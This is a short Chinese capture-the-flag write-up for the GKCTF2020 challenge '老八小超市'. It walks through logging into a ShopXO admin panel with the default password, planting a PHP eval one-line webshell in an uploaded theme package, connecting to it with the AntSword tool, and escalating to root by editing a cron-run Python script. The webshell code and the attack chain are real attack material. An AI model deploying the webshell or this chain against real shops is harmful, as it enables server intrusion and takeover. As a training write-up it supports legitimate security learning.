GKCTF2020 - 老八小超市

老八小超市

网页是个购物网站模板，后台是admin.php

查询得知ShopXO默认密码为shopxo

登陆进入后台，查找主题模板，并下载免费的默认模板

 

在模板压缩包的_static_目录下，插入一句话木马并上传

<?php
    @eval($_POST[a]);
    phpinfo(); 
?>

 

上传以后会自动安装

WP里面给了相关文章告诉我们文件路径，这里查看主页上的头像也能知道文件的位置

之后我们构造url访问，执行了phpinfo()

使用蚁剑连接，查看flag，提示flag位置

但是我们没有访问那个文件的权限

之后查看红色的auto.sh文件，发现每隔60秒执行python文件

查看python文件，发现有修改权限，且有root的执行权限，能每60秒刷新hint文件。

学大佬修改python文件，读取flag并写入hint文件

查看得flag

 

PS:题目崩了一次，连接崩了几次，做到头疼